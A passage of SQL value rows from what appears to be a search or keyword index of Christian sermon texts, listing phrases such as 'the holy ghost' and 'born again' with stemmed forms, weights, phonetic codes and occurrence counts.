(13235, 'that god is', 'that god is', 0, 1, 1.3667, 'T232', 7, '*'),
(13236, 'that he', 'that he', 0, 1, 1.2333, 'T000', 14, '*'),
(13238, 'that i', 'that i', 0, 1, 1.2, 'T000', 6, '*'),
(13240, 'that i have', 'that i have', 0, 1, 1.3667, 'T100', 2, '*'),
(13241, 'that if you', 'that if you', 0, 1, 1.3667, 'T100', 3, '*'),
(13242, 'that is not', 'that is not', 0, 1, 1.3667, 'T253', 3, '*'),
(13247, 'that the', 'that the', 0, 1, 1.2667, 'T000', 16, '*'),
(13251, 'that you', 'that you', 0, 1, 1.2667, 'T000', 22, '*'),
(13252, 'that you can', 'that you can', 0, 1, 1.4, 'T250', 5, '*'),
(13258, 'the bible', 'the bible', 0, 1, 1.3, 'T140', 18, '*'),
(13259, 'the bible says', 'the bible says', 0, 1, 1.4667, 'T142', 10, '*'),
(13260, 'the books', 'the books', 0, 1, 1.3, 'T120', 3, '*'),
(13262, 'the calling', 'the calling', 0, 1, 1.3667, 'T2452', 10, '*'),
(13263, 'the calling and', 'the calling and', 0, 1, 1.5, 'T245253', 2, '*'),
(13264, 'the devil', 'the devil', 0, 1, 1.3, 'T140', 22, '*'),
(13266, 'the father', 'the father', 0, 1, 1.3333, 'T136', 8, '*'),
(13267, 'the father has', 'the father has', 0, 1, 1.4667, 'T1362', 3, '*'),
(13272, 'the lord', 'the lord', 0, 1, 1.2667, 'T463', 37, '*'),
(13276, 'the place', 'the place', 0, 1, 1.3, 'T142', 10, '*'),
(13277, 'the place of', 'the place of', 0, 1, 1.4, 'T1421', 9, '*'),
(13280, 'the same', 'the same', 0, 1, 1.2667, 'T250', 7, '*'),
(13282, 'the will', 'the will', 0, 1, 1.2667, 'T400', 3, '*'),
(13283, 'the will of', 'the will of', 0, 1, 1.3667, 'T410', 3, '*'),
(13284, 'the words', 'the words', 0, 1, 1.3, 'T632', 3, '*'),
(13286, 'the work', 'the work', 0, 1, 1.2667, 'T620', 4, '*'),
(13287, 'the work of', 'the work of', 0, 1, 1.3667, 'T621', 4, '*'),
(13288, 'them', 'them', 0, 0, 0.2667, 'T500', 36, '*'),
(13299, 'there', 'there', 0, 0, 0.3333, 'T600', 41, '*'),
(13300, 'there are', 'there are', 0, 1, 1.3, 'T600', 22, '*'),
(13301, 'there are some', 'there are some', 0, 1, 1.4667, 'T625', 3, '*'),
(13302, 'there is', 'there is', 0, 1, 1.2667, 'T620', 27, '*'),
(13303, 'there is a', 'there is a', 0, 1, 1.3333, 'T620', 16, '*'),
(13304, 'therefore', 'therefor', 0, 0, 0.6, 'T616', 16, '*'),
(13307, 'things', 'thing', 0, 0, 0.4, 'T520', 31, '*'),
(13308, 'things that', 'thing that', 0, 1, 1.3667, 'T523', 8, '*'),
(13314, 'through', 'through', 0, 0, 0.4667, 'T620', 31, '*'),
(13317, 'times', 'time', 0, 0, 0.3333, 'T520', 15, '*'),
(13320, 'to a', 'to a', 0, 1, 1.1333, 'T000', 15, '*'),
(13324, 'to develop', 'to develop', 0, 1, 1.3333, 'T141', 4, '*'),
(13326, 'to do', 'to do', 0, 1, 1.1667, 'T000', 24, '*'),
(13331, 'to do is', 'to do is', 0, 1, 1.2667, 'T200', 3, '*'),
(13333, 'to do what', 'to do what', 0, 1, 1.3333, 'T000', 4, '*'),
(13334, 'to exercise', 'to exercise', 0, 1, 1.3667, 'T262', 2, '*'),
(13336, 'to make', 'to make', 0, 1, 1.2333, 'T520', 13, '*'),
(13342, 'to the', 'to the', 0, 1, 1.2, 'T000', 39, '*'),
(13345, 'to them', 'to them', 0, 1, 1.2333, 'T500', 6, '*'),
(13347, 'too', 'too', 0, 0, 0.2, 'T000', 12, '*'),
(13348, 'too soon', 'too soon', 0, 1, 1.2667, 'T250', 3, '*'),
(13359, 'us and', 'us and', 0, 1, 1.2, 'U253', 4, '*'),
(13361, 'us we', 'us we', 0, 1, 1.1667, 'U200', 2, '*'),
(13363, 'us with', 'us with', 0, 1, 1.2333, 'U230', 2, '*'),
(13367, 'using your', 'us your', 0, 1, 1.3333, 'U2526', 2, '*'),
(13370, 'want', 'want', 0, 0, 0.2667, 'W530', 16, '*'),
(13371, 'want to', 'want to', 0, 1, 1.2333, 'W530', 11, '*'),
(13375, 'we must be', 'we must be', 0, 1, 1.3333, 'W5231', 2, '*'),
(13376, 'we need', 'we need', 0, 1, 1.2333, 'W530', 3, '*'),
(13378, 'what he', 'what he', 0, 1, 1.2333, 'W300', 4, '*'),
(13380, 'what is', 'what is', 0, 1, 1.2333, 'W320', 15, '*'),
(13383, 'what is the', 'what is the', 0, 1, 1.3667, 'W323', 4, '*'),
(13384, 'what you', 'what you', 0, 1, 1.2667, 'W300', 15, '*'),
(13385, 'what you are', 'what you are', 0, 1, 1.4, 'W360', 5, '*'),
(13387, 'whatever', 'whatev', 0, 0, 0.5333, 'W316', 7, '*'),
(13388, 'whatever god', 'whatev god', 0, 1, 1.4, 'W31623', 2, '*'),
(13390, 'when', 'when', 0, 0, 0.2667, 'W500', 45, '*'),
(13391, 'when i', 'when i', 0, 1, 1.2, 'W500', 5, '*'),
(13393, 'when you', 'when you', 0, 1, 1.2667, 'W500', 28, '*'),
(13394, 'when you are', 'when you are', 0, 1, 1.4, 'W560', 9, '*'),
(13396, 'while', 'while', 0, 0, 0.3333, 'W400', 10, '*'),
(13399, 'will do', 'will do', 0, 1, 1.2333, 'W430', 7, '*'),
(13401, 'will of', 'will of', 0, 1, 1.2333, 'W410', 3, '*'),
(13402, 'will of god', 'will of god', 0, 1, 1.3667, 'W4123', 3, '*'),
(13405, 'with god', 'with god', 0, 1, 1.2667, 'W323', 15, '*'),
(13408, 'with god the', 'with god the', 0, 1, 1.4, 'W323', 4, '*'),
(13409, 'with people', 'with people', 0, 1, 1.3667, 'W314', 4, '*'),
(13411, 'with the', 'with the', 0, 1, 1.2667, 'W300', 33, '*'),
(13413, 'with us', 'with us', 0, 1, 1.2333, 'W320', 3, '*'),
(13416, 'words', 'word', 0, 0, 0.3333, 'W632', 13, '*'),
(13419, 'work', 'work', 0, 0, 0.2667, 'W620', 24, '*'),
(13420, 'work of', 'work of', 0, 1, 1.2333, 'W621', 5, '*'),
(13421, 'work of god', 'work of god', 0, 1, 1.3667, 'W62123', 3, '*'),
(13422, 'write', 'write', 0, 0, 0.3333, 'W630', 2, '*'),
(13425, 'written', 'written', 0, 0, 0.4667, 'W635', 6, '*'),
(13428, 'year', 'year', 0, 0, 0.2667, 'Y600', 12, '*'),
(13433, 'years', 'year', 0, 0, 0.3333, 'Y620', 9, '*'),
(13438, 'you are', 'you are', 0, 1, 1.2333, 'Y600', 41, '*'),
(13440, 'you are doing', 'you are doing', 0, 1, 1.4333, 'Y6352', 2, '*'),
(13442, 'you can', 'you can', 0, 1, 1.2333, 'Y250', 18, '*'),
(13445, 'you did', 'you did', 0, 1, 1.2333, 'Y300', 2, '*'),
(13449, 'you have', 'you have', 0, 1, 1.2667, 'Y100', 27, '*'),
(13450, 'you have done', 'you have done', 0, 1, 1.4333, 'Y135', 2, '*'),
(13454, 'you in', 'you in', 0, 1, 1.2, 'Y500', 18, '*'),
(13455, 'you in jesus\'', 'you in jesus', 0, 1, 1.4333, 'Y520', 6, '*'),
(13456, 'you know', 'you know', 0, 1, 1.2667, 'Y250', 9, '*'),
(13458, 'you must', 'you must', 0, 1, 1.2667, 'Y523', 31, '*'),
(13460, 'you need', 'you need', 0, 1, 1.2667, 'Y530', 15, '*'),
(13463, 'you need to', 'you need to', 0, 1, 1.3667, 'Y530', 13, '*'),
(13465, 'you receive', 'you receive', 0, 1, 1.3667, 'Y621', 2, '*'),
(13471, 'you to do', 'you to do', 0, 1, 1.3, 'Y300', 7, '*'),
(13472, 'you will', 'you will', 0, 1, 1.2667, 'Y400', 26, '*'),
(13473, 'you will do', 'you will do', 0, 1, 1.3667, 'Y430', 2, '*'),
(13476, 'your best', 'your best', 0, 1, 1.3, 'Y6123', 4, '*'),
(13480, 'your spirit', 'your spirit', 0, 1, 1.3667, 'Y62163', 9, '*'),
(15694, '19', '19', 0, 0, 0.2, '', 11, '*'),
(15727, '9', '9', 0, 0, 0.1, '', 17, '*'),
(15754, 'a sinner', 'a sinner', 0, 1, 1.2667, 'A256', 2, '*'),
(15775, 'acts', 'act', 0, 0, 0.2667, 'A232', 11, '*'),
(15781, 'again', 'again', 0, 0, 0.3333, 'A250', 11, '*'),
(15864, 'and the', 'and the', 0, 1, 1.2333, 'A530', 27, '*'),
(15887, 'any', 'ani', 0, 0, 0.2, 'A500', 25, '*'),
(15895, 'are all', 'ar all', 0, 1, 1.2333, 'A640', 7, '*'),
(15937, 'away', 'awai', 0, 0, 0.2667, 'A000', 19, '*'),
(15940, 'away from', 'awai from', 0, 1, 1.3, 'A165', 10, '*'),
(16014, 'born', 'born', 0, 0, 0.2667, 'B650', 8, '*'),
(16015, 'born again', 'born again', 0, 1, 1.3333, 'B6525', 6, '*'),
(16029, 'came', 'came', 0, 0, 0.2667, 'C500', 13, '*'),
(16086, 'confession', 'confess', 0, 0, 0.6667, 'C5125', 8, '*'),
(16095, 'cor', 'cor', 0, 0, 0.2, 'C600', 6, '*'),
(16134, 'does', 'doe', 0, 0, 0.2667, 'D200', 14, '*'),
(16135, 'does not', 'doe not', 0, 1, 1.2667, 'D253', 12, '*'),
(16160, 'evidence', 'evid', 0, 0, 0.5333, 'E1352', 2, '*'),
(16161, 'evidence of', 'evid of', 0, 1, 1.3667, 'E13521', 2, '*'),
(16311, 'him you', 'him you', 0, 1, 1.2333, 'H500', 5, '*'),
(16327, 'how', 'how', 0, 0, 0.2, 'H000', 31, '*'),
(16453, 'john', 'john', 0, 0, 0.2667, 'J500', 11, '*'),
(16468, 'knowledge', 'knowledg', 0, 0, 0.6, 'K5432', 7, '*'),
(16629, 'of a', 'of a', 0, 1, 1.1333, 'O100', 18, '*'),
(16648, 'of life', 'of life', 0, 1, 1.2333, 'O141', 10, '*'),
(16689, 'one of', 'on of', 0, 1, 1.2, 'O510', 15, '*'),
(16690, 'one of the', 'on of the', 0, 1, 1.3333, 'O513', 11, '*'),
(16737, 'pray', 'prai', 0, 0, 0.2667, 'P600', 19, '*'),
(16740, 'prayer', 'prayer', 0, 0, 0.4, 'P600', 17, '*'),
(16749, 'presence', 'presenc', 0, 0, 0.5333, 'P6252', 10, '*'),
(16750, 'presence of', 'presenc of', 0, 1, 1.3667, 'P62521', 8, '*'),
(16927, 'sinner', 'sinner', 0, 0, 0.4, 'S560', 4, '*'),
(16949, 'spiritual', 'spiritu', 0, 0, 0.6, 'S1634', 13, '*'),
(17024, 'the presence', 'the presence', 0, 1, 1.4, 'T16252', 7, '*'),
(17025, 'the presence of', 'the presence of', 0, 1, 1.5, 'T162521', 7, '*'),
(17047, 'then', 'then', 0, 0, 0.2667, 'T500', 18, '*'),
(17058, 'they', 'thei', 0, 0, 0.2667, 'T000', 36, '*'),
(17126, 'to him', 'to him', 0, 1, 1.2, 'T500', 5, '*'),
(17138, 'to you', 'to you', 0, 1, 1.2, 'T000', 15, '*'),
(17140, 'today', 'todai', 0, 0, 0.3333, 'T000', 27, '*'),
(17141, 'today i', 'todai i', 0, 1, 1.2333, 'T000', 4, '*'),
(17227, 'word', 'word', 0, 0, 0.2667, 'W630', 24, '*'),
(17287, 'you\'re', 'you', 0, 0, 0.4, 'Y600', 7, '*'),
(17296, 'your heart', 'your heart', 0, 1, 1.3333, 'Y630', 10, '*'),
(17331, '“what', '“what', 0, 0, 0.3333, '“300', 2, '*'),
(20794, '1 cor', '1 cor', 0, 1, 1.1667, 'C600', 3, '*'),
(20797, '1-4', '1-4', 0, 0, 0.3, '', 2, '*'),
(20800, '1-6', '1-6', 0, 0, 0.3, '', 4, '*'),
(20804, '12', '12', 0, 0, 0.2, '', 21, '*'),
(20807, '14', '14', 0, 0, 0.2, '', 12, '*'),
(20814, '16', '16', 0, 0, 0.2, '', 14, '*'),
(20832, '39', '39', 0, 0, 0.2, '', 3, '*'),
(20850, 'a genuine', 'a genuine', 0, 1, 1.3, 'A250', 3, '*'),
(20864, 'advantage', 'advantag', 0, 0, 0.6, 'A31532', 5, '*'),
(20870, 'against', 'against', 0, 0, 0.4667, 'A2523', 11, '*'),
(20871, 'against the', 'against the', 0, 1, 1.3667, 'A2523', 5, '*'),
(20873, 'an advantage', 'an advantage', 0, 1, 1.4, 'A531532', 2, '*'),
(20875, 'and for', 'and for', 0, 1, 1.2333, 'A5316', 3, '*'),
(20877, 'and get', 'and get', 0, 1, 1.2333, 'A5323', 3, '*'),
(20882, 'and then', 'and then', 0, 1, 1.2667, 'A535', 7, '*'),
(20884, 'and you', 'and you', 0, 1, 1.2333, 'A530', 25, '*'),
(20885, 'and you will', 'and you will', 0, 1, 1.4, 'A534', 7, '*'),
(20886, 'and your', 'and your', 0, 1, 1.2667, 'A536', 11, '*'),
(20893, 'as they', 'as they', 0, 1, 1.2333, 'A230', 2, '*'),
(20900, 'baptism', 'baptism', 0, 0, 0.4667, 'B325', 3, '*'),
(20912, 'because the', 'becaus the', 0, 1, 1.3667, 'B230', 5, '*'),
(20914, 'begin', 'begin', 0, 0, 0.3333, 'B250', 9, '*'),
(20915, 'begin to', 'begin to', 0, 1, 1.2667, 'B253', 9, '*'),
(20917, 'believer', 'believ', 0, 0, 0.5333, 'B416', 6, '*'),
(20918, 'believer and', 'believ and', 0, 1, 1.4, 'B41653', 2, '*'),
(20922, 'beyond', 'beyond', 0, 0, 0.4, 'B530', 4, '*'),
(20926, 'but the', 'but the', 0, 1, 1.2333, 'B300', 8, '*'),
(20933, 'called', 'call', 0, 0, 0.4, 'C430', 14, '*'),
(20936, 'came against', 'came against', 0, 1, 1.4, 'C52523', 2, '*'),
(20938, 'children', 'children', 0, 0, 0.5333, 'C4365', 12, '*'),
(20945, 'coming', 'come', 0, 0, 0.4, 'C520', 9, '*'),
(20956, 'demonic', 'demon', 0, 0, 0.4667, 'D520', 5, '*'),
(20959, 'desire', 'desir', 0, 0, 0.4, 'D260', 6, '*'),
(20962, 'discouraged', 'discourag', 0, 0, 0.7333, 'D2623', 2, '*'),
(20965, 'doesn\'t', 'doesn', 0, 0, 0.4667, 'D253', 8, '*'),
(20970, 'don\'t get', 'don get', 0, 1, 1.3, 'D5323', 3, '*'),
(20981, 'e', 'e', 0, 0, 0.0667, 'E000', 7, '*'),
(20984, 'encourage', 'encourag', 0, 0, 0.6, 'E5262', 4, '*'),
(20992, 'faith and', 'faith and', 0, 1, 1.3, 'F353', 5, '*'),
(20994, 'fast', 'fast', 0, 0, 0.2667, 'F230', 5, '*'),
(21006, 'for you and', 'for you and', 0, 1, 1.3667, 'F653', 3, '*'),
(21011, 'genuine', 'genuin', 0, 0, 0.4667, 'G500', 4, '*'),
(21018, 'ghost', 'ghost', 0, 0, 0.3333, 'G300', 7, '*'),
(21019, 'ghost baptism', 'ghost baptism', 0, 1, 1.4333, 'G31325', 2, '*'),
(21037, 'going', 'go', 0, 0, 0.3333, 'G520', 18, '*'),
(21038, 'going to', 'go to', 0, 1, 1.2667, 'G523', 6, '*'),
(21043, 'hands', 'hand', 0, 0, 0.3333, 'H532', 7, '*'),
(21046, 'hands on', 'hand on', 0, 1, 1.2667, 'H5325', 2, '*'),
(21050, 'have to', 'have to', 0, 1, 1.2333, 'H130', 7, '*'),
(21054, 'him a', 'him a', 0, 1, 1.1667, 'H500', 5, '*'),
(21056, 'him and', 'him and', 0, 1, 1.2333, 'H530', 4, '*'),
(21062, 'him in', 'him in', 0, 1, 1.2, 'H500', 5, '*'),
(21063, 'him in the', 'him in the', 0, 1, 1.3333, 'H530', 3, '*'),
(21066, 'him to', 'him to', 0, 1, 1.2, 'H530', 3, '*'),
(21070, 'him your', 'him your', 0, 1, 1.2667, 'H560', 2, '*'),
(21074, 'his hands', 'hi hands', 0, 1, 1.3, 'H2532', 4, '*'),
(21076, 'holy', 'holi', 0, 0, 0.2667, 'H400', 23, '*'),
(21077, 'holy ghost', 'holi ghost', 0, 1, 1.3333, 'H423', 7, '*'),
(21078, 'holy ghost baptism', 'holi ghost baptism', 0, 1, 1.6, 'H4231325', 2, '*'),
(21083, 'how to', 'how to', 0, 1, 1.2, 'H300', 12, '*'),
(21085, 'i e', 'i e', 0, 1, 1.1, 'I000', 6, '*'),
(21087, 'if he', 'if he', 0, 1, 1.1667, 'I100', 7, '*'),
(21089, 'if the', 'if the', 0, 1, 1.2, 'I130', 5, '*'),
(21094, 'in a', 'in a', 0, 1, 1.1333, 'I500', 15, '*'),
(21096, 'in the place', 'in the place', 0, 1, 1.4, 'I53142', 6, '*'),
(21097, 'in tongues', 'in tongues', 0, 1, 1.3333, 'I5352', 4, '*'),
(21101, 'is for', 'is for', 0, 1, 1.2, 'I216', 4, '*'),
(21102, 'is for you', 'is for you', 0, 1, 1.3333, 'I216', 2, '*'),
(21103, 'is going', 'is going', 0, 1, 1.2667, 'I252', 5, '*'),
(21104, 'is going to', 'is going to', 0, 1, 1.3667, 'I2523', 4, '*'),
(21110, 'it should', 'it should', 0, 1, 1.3, 'I3243', 2, '*'),
(21111, 'it should be', 'it should be', 0, 1, 1.4, 'I32431', 2, '*'),
(21119, 'lastly', 'lastli', 0, 0, 0.4, 'L234', 4, '*'),
(21127, 'let him', 'let him', 0, 1, 1.2333, 'L350', 7, '*'),
(21142, 'minister', 'minist', 0, 0, 0.5333, 'M236', 9, '*'),
(21145, 'minister of', 'minist of', 0, 1, 1.3667, 'M2361', 3, '*'),
(21150, 'move', 'move', 0, 0, 0.2667, 'M100', 10, '*'),
(21161, 'of god is', 'of god is', 0, 1, 1.3, 'O1232', 4, '*'),
(21168, 'of the holy', 'of the holy', 0, 1, 1.3667, 'O134', 8, '*'),
(21173, 'on you', 'on you', 0, 1, 1.2, 'O500', 4, '*'),
(21177, 'personally', 'person', 0, 0, 0.6667, 'P6254', 5, '*'),
(21181, 'power', 'power', 0, 0, 0.3333, 'P600', 9, '*'),
(21182, 'power of', 'power of', 0, 1, 1.2667, 'P610', 3, '*'),
(21184, 'pray for', 'prai for', 0, 1, 1.2667, 'P616', 8, '*'),
(21188, 'praying', 'prai', 0, 0, 0.4667, 'P652', 5, '*'),
(21189, 'praying for', 'prai for', 0, 1, 1.3667, 'P65216', 2, '*'),
(21191, 'promise', 'promis', 0, 0, 0.4667, 'P652', 4, '*'),
(21201, 'romans', 'roman', 0, 0, 0.4, 'R520', 5, '*'),
(21202, 'romans 8', 'roman 8', 0, 1, 1.2667, 'R520', 3, '*'),
(21205, 'servant', 'servant', 0, 0, 0.4667, 'S6153', 28, '*'),
(21208, 'should', 'should', 0, 0, 0.4, 'S430', 22, '*'),
(21209, 'should be', 'should be', 0, 1, 1.3, 'S431', 3, '*'),
(21213, 'speak', 'speak', 0, 0, 0.3333, 'S120', 10, '*'),
(21216, 'speak in', 'speak in', 0, 1, 1.2667, 'S125', 4, '*'),
(21217, 'speak in tongues', 'speak in tongues', 0, 1, 1.5333, 'S125352', 2, '*'),
(21218, 'speaking', 'speak', 0, 0, 0.5333, 'S1252', 8, '*'),
(21219, 'speaking in', 'speak in', 0, 1, 1.3667, 'S12525', 5, '*'),
(21220, 'speaking in tongues', 'speak in tongues', 0, 1, 1.6333, 'S12525352', 3, '*'),
(21223, 'start speaking', 'start speaking', 0, 1, 1.4667, 'S36321252', 2, '*'),
(21228, 'study', 'studi', 0, 0, 0.3333, 'S300', 7, '*'),
(21236, 'teach', 'teach', 0, 0, 0.3333, 'T200', 2, '*'),
(21239, 'that are', 'that are', 0, 1, 1.2667, 'T600', 8, '*'),
(21243, 'the believer', 'the believer', 0, 1, 1.4, 'T1416', 3, '*'),
(21244, 'the believer and', 'the believer and', 0, 1, 1.5333, 'T141653', 2, '*'),
(21248, 'the holy', 'the holy', 0, 1, 1.2667, 'T400', 18, '*'),
(21249, 'the holy ghost', 'the holy ghost', 0, 1, 1.4667, 'T423', 6, '*'),
(21251, 'the power', 'the power', 0, 1, 1.3, 'T160', 4, '*'),
(21252, 'the power of', 'the power of', 0, 1, 1.4, 'T161', 3, '*'),
(21253, 'the promise', 'the promise', 0, 1, 1.3667, 'T1652', 2, '*'),
(21262, 'they come', 'thei come', 0, 1, 1.3, 'T250', 2, '*'),
(21267, 'to come', 'to come', 0, 1, 1.2333, 'T250', 7, '*'),
(21270, 'to keep', 'to keep', 0, 1, 1.2333, 'T210', 5, '*'),
(21272, 'to receive', 'to receive', 0, 1, 1.3333, 'T621', 4, '*'),
(21274, 'to speak', 'to speak', 0, 1, 1.2667, 'T212', 4, '*'),
(21275, 'to speak in', 'to speak in', 0, 1, 1.3667, 'T2125', 2, '*'),
(21278, 'to start', 'to start', 0, 1, 1.2667, 'T2363', 3, '*'),
(21280, 'to the holy', 'to the holy', 0, 1, 1.3667, 'T400', 5, '*'),
(21283, 'to you by', 'to you by', 0, 1, 1.3, 'T100', 2, '*'),
(21284, 'tongues', 'tongu', 0, 0, 0.4667, 'T520', 3, '*'),
(21292, 'unbeliever', 'unbeliev', 0, 0, 0.6667, 'U51416', 3, '*'),
(21295, 'understand that', 'understand that', 0, 1, 1.5, 'U5362353', 5, '*'),
(21296, 'understand that the', 'understand that the', 0, 1, 1.6333, 'U5362353', 2, '*'),
(21297, 'upon', 'upon', 0, 0, 0.2667, 'U150', 13, '*'),
(21302, 'which is', 'which is', 0, 1, 1.2667, 'W200', 8, '*'),
(21303, 'which is the', 'which is the', 0, 1, 1.4, 'W230', 3, '*'),
(21304, 'will begin', 'will begin', 0, 1, 1.3333, 'W4125', 2, '*'),
(21305, 'will begin to', 'will begin to', 0, 1, 1.4333, 'W41253', 2, '*'),
(21308, 'yet', 'yet', 0, 0, 0.2, 'Y300', 8, '*'),
(21316, 'you and', 'you and', 0, 1, 1.2333, 'Y530', 9, '*'),
(21319, 'you and your', 'you and your', 0, 1, 1.4, 'Y536', 2, '*'),
(21320, 'you by', 'you by', 0, 1, 1.2, 'Y100', 5, '*'),
(21322, 'you have to', 'you have to', 0, 1, 1.3667, 'Y130', 6, '*'),
(21323, 'you if', 'you if', 0, 1, 1.2, 'Y100', 4, '*'),
(21327, 'you personally', 'you personally', 0, 1, 1.4667, 'Y16254', 4, '*'),
(21330, 'your children', 'your children', 0, 1, 1.4333, 'Y624365', 3, '*'),
(22843, '1 15', '1 15', 0, 1, 1.1333, '', 2, '*'),
(22845, '1 tim', '1 tim', 0, 1, 1.1667, 'T500', 2, '*'),
(22850, '15', '15', 0, 0, 0.2, '', 11, '*'),
(22853, '17', '17', 0, 0, 0.2, '', 10, '*'),
(22860, '23', '23', 0, 0, 0.2, '', 9, '*'),
(22868, '3 19', '3 19', 0, 1, 1.1333, '', 2, '*'),
(22873, '5 17', '5 17', 0, 1, 1.1333, '', 2, '*'),
(22890, '9 6', '9 6', 0, 1, 1.1, '', 2, '*'),
(22892, '9-10', '9-10', 0, 0, 0.4, '', 3, '*'),
(22901, 'a faithful', 'a faithful', 0, 1, 1.3333, 'A1314', 3, '*'),
(22903, 'a lot', 'a lot', 0, 1, 1.1667, 'A430', 11, '*'),
(22904, 'a lot of', 'a lot of', 0, 1, 1.2667, 'A431', 7, '*'),
(22905, 'a major', 'a major', 0, 1, 1.2333, 'A526', 2, '*'),
(22907, 'a new', 'a new', 0, 1, 1.1667, 'A500', 4, '*'),
(22908, 'a new creature', 'a new creature', 0, 1, 1.4667, 'A52636', 2, '*'),
(22910, 'a personal', 'a personal', 0, 1, 1.3333, 'A16254', 3, '*'),
(22916, 'a spiritual', 'a spiritual', 0, 1, 1.3667, 'A21634', 2, '*'),
(22931, 'act', 'act', 0, 0, 0.2, 'A230', 5, '*'),
(22934, 'acts 9', 'act 9', 0, 1, 1.2, 'A232', 2, '*'),
(22935, 'acts 9 6', 'act 9 6', 0, 1, 1.2667, 'A232', 2, '*'),
(22954, 'all my', 'all my', 0, 1, 1.2, 'A450', 3, '*'),
(22962, 'all these', 'all these', 0, 1, 1.3, 'A432', 7, '*'),
(22964, 'all things', 'all things', 0, 1, 1.3333, 'A4352', 6, '*'),
(22968, 'am', 'am', 0, 0, 0.1333, 'A500', 10, '*'),
(22969, 'amen', 'amen', 0, 0, 0.2667, 'A500', 7, '*'),
(22974, 'and all', 'and all', 0, 1, 1.2333, 'A534', 4, '*'),
(22979, 'and be', 'and be', 0, 1, 1.2, 'A531', 6, '*'),
(22980, 'and be converted', 'and be converted', 0, 1, 1.5333, 'A53125163', 2, '*'),
(22997, 'and have', 'and have', 0, 1, 1.2667, 'A531', 4, '*'),
(22999, 'and his', 'and his', 0, 1, 1.2333, 'A532', 6, '*'),
(23003, 'and make', 'and make', 0, 1, 1.2667, 'A5352', 5, '*'),
(23007, 'and men', 'and men', 0, 1, 1.2333, 'A535', 3, '*'),
(23011, 'and one', 'and one', 0, 1, 1.2333, 'A535', 2, '*'),
(23017, 'and saviour', 'and saviour', 0, 1, 1.3667, 'A53216', 2, '*'),
(23023, 'and the world', 'and the world', 0, 1, 1.4333, 'A53643', 2, '*'),
(23026, 'and when', 'and when', 0, 1, 1.2667, 'A535', 6, '*'),
(23036, 'answer', 'answer', 0, 0, 0.4, 'A526', 2, '*'),
(23045, 'anyone', 'anyon', 0, 0, 0.4, 'A500', 3, '*'),
(23048, 'are a', 'ar a', 0, 1, 1.1667, 'A600', 7, '*'),
(23056, 'are full', 'ar full', 0, 1, 1.2667, 'A614', 1, '*'),
(23057, 'are full of', 'ar full of', 0, 1, 1.3667, 'A6141', 1, '*'),
(23058, 'are good', 'ar good', 0, 1, 1.2667, 'A623', 3, '*'),
(23072, 'as the', 'as the', 0, 1, 1.2, 'A230', 4, '*'),
(23074, 'as you', 'as you', 0, 1, 1.2, 'A200', 14, '*'),
(23076, 'assume', 'assum', 0, 0, 0.4, 'A250', 2, '*'),
(23084, 'assumption', 'assumpt', 0, 0, 0.6667, 'A25135', 2, '*'),
(23089, 'attitude to', 'attitud to', 0, 1, 1.3667, 'A300', 2, '*'),
(23093, 'away from sin', 'awai from sin', 0, 1, 1.4333, 'A16525', 2, '*'),
(23094, 'based', 'base', 0, 0, 0.3333, 'B230', 3, '*'),
(23097, 'be blotted', 'be blotted', 0, 1, 1.3333, 'B430', 2, '*'),
(23098, 'be blotted out', 'be blotted out', 0, 1, 1.4667, 'B430', 2, '*'),
(23099, 'be converted', 'be converted', 0, 1, 1.4, 'B25163', 2, '*'),
(23100, 'be converted that', 'be converted that', 0, 1, 1.5667, 'B25163', 2, '*'),
(23103, 'be in', 'be in', 0, 1, 1.1667, 'B500', 8, '*'),
(23107, 'be saved', 'be saved', 0, 1, 1.2667, 'B213', 2, '*'),
(23114, 'be the', 'be the', 0, 1, 1.2, 'B300', 7, '*'),
(23116, 'because of', 'becaus of', 0, 1, 1.3333, 'B210', 10, '*'),
(23118, 'because you', 'becaus you', 0, 1, 1.3667, 'B200', 6, '*'),
(23119, 'because you have', 'becaus you have', 0, 1, 1.5333, 'B210', 2, '*'),
(23122, 'behold', 'behold', 0, 0, 0.4, 'B430', 6, '*'),
(23125, 'being', 'be', 0, 0, 0.3333, 'B520', 22, '*'),
(23130, 'being you', 'be you', 0, 1, 1.3, 'B520', 1, '*'),
(23131, 'being you are', 'be you are', 0, 1, 1.4333, 'B526', 1, '*'),
(23144, 'beloved', 'belov', 0, 0, 0.4667, 'B413', 32, '*'),
(23149, 'between', 'between', 0, 0, 0.4667, 'B350', 11, '*'),
(23150, 'between god', 'between god', 0, 1, 1.3667, 'B3523', 2, '*'),
(23151, 'between god and', 'between god and', 0, 1, 1.5, 'B352353', 2, '*'),
(23152, 'bible said', 'bibl said', 0, 1, 1.3333, 'B423', 2, '*'),
(23155, 'black', 'black', 0, 0, 0.3333, 'B420', 2, '*'),
(23158, 'blood', 'blood', 0, 0, 0.3333, 'B430', 3, '*'),
(23163, 'blotted', 'blot', 0, 0, 0.4667, 'B430', 2, '*'),
(23164, 'blotted out', 'blot out', 0, 1, 1.3667, 'B430', 2, '*'),
(23165, 'blotted out when', 'blot out when', 0, 1, 1.5333, 'B435', 2, '*'),
(23183, 'can be', 'can be', 0, 1, 1.2, 'C510', 9, '*'),
(23195, 'check', 'check', 0, 0, 0.3333, 'C000', 8, '*'),
(23201, 'christ', 'christ', 0, 0, 0.4, 'C623', 16, '*'),
(23206, 'christ jesus', 'christ jesus', 0, 1, 1.4, 'C6232', 3, '*'),
(23209, 'church', 'church', 0, 0, 0.4, 'C620', 22, '*'),
(23212, 'churches', 'church', 0, 0, 0.5333, 'C620', 3, '*'),
(23215, 'come from', 'come from', 0, 1, 1.3, 'C5165', 2, '*'),
(23216, 'come from the', 'come from the', 0, 1, 1.4333, 'C51653', 2, '*'),
(23219, 'come to', 'come to', 0, 1, 1.2333, 'C530', 11, '*'),
(23220, 'come to you', 'come to you', 0, 1, 1.3667, 'C530', 2, '*'),
(23223, 'comes to', 'come to', 0, 1, 1.2667, 'C523', 3, '*'),
(23225, 'committed', 'commit', 0, 0, 0.6, 'C530', 8, '*'),
(23226, 'committed to', 'commit to', 0, 1, 1.4, 'C530', 8, '*'),
(23231, 'confess', 'confess', 0, 0, 0.4667, 'C512', 4, '*'),
(23240, 'converted', 'convert', 0, 0, 0.6, 'C5163', 2, '*'),
(23241, 'converted that', 'convert that', 0, 1, 1.4667, 'C5163', 2, '*'),
(23242, 'converted that your', 'convert that your', 0, 1, 1.6333, 'C51636', 2, '*'),
(23245, 'creature', 'creatur', 0, 0, 0.5333, 'C636', 3, '*'),
(23251, 'critical', 'critic', 0, 0, 0.5333, 'C6324', 7, '*'),
(23256, 'dead', 'dead', 0, 0, 0.2667, 'D000', 7, '*'),
(23259, 'decision', 'decis', 0, 0, 0.5333, 'D250', 5, '*'),
